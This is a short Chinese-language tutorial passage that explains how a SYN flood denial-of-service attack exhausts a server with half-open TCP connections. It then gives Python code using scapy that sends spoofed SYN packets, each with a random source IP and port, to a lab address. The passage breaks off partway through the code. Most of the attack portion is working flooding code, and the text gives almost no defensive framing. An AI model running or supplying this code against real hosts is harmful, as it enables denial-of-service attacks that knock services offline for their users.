SYN泛洪攻击(SYN Flood)是一种比较常用的DoS方式之一。通过发送大量伪造的Tcp连接请求,使被攻击主机资源耗尽(通常是CPU满负荷或者内存不足) 的攻击方式。
SYN攻击是客户端向服务器发送SYN报文之后就不再响应服务器回应的报文,由于服务器在处理TCP请求时,会在协议栈留一块缓冲区来存储握手的过程,如果超过一定的时间没有接收到客户端的报文,那么本次连接在协议栈中存储的数据就会被丢弃。攻击者如果利用这段时间发送了大量的连接请求,全部挂起在半连接状态,这样将不断消耗服务器资源,直到拒接服务。
scapy是一个功能强大网络数据包处理程序,包括对数据包的嗅探、解析和构造。本文即使用其数据包构造功能,实现syn flooding攻击。
Python代码如下所示:
from scapy.all import *
import random
def synFlood():
for i in range(10000):
#构造随机的源IP
src='%i.%i.%i.%i'%(
random.randint(1,255),
random.randint(1, 255),
random.randint(1, 255),
random.randint(1, 255)
)
#构造随机的端口
sport=random.randint(1024,65535)
IPlayer=IP(src=src,dst='192.168.37.130')
TCPlayer=TCP(sport=sport,dport&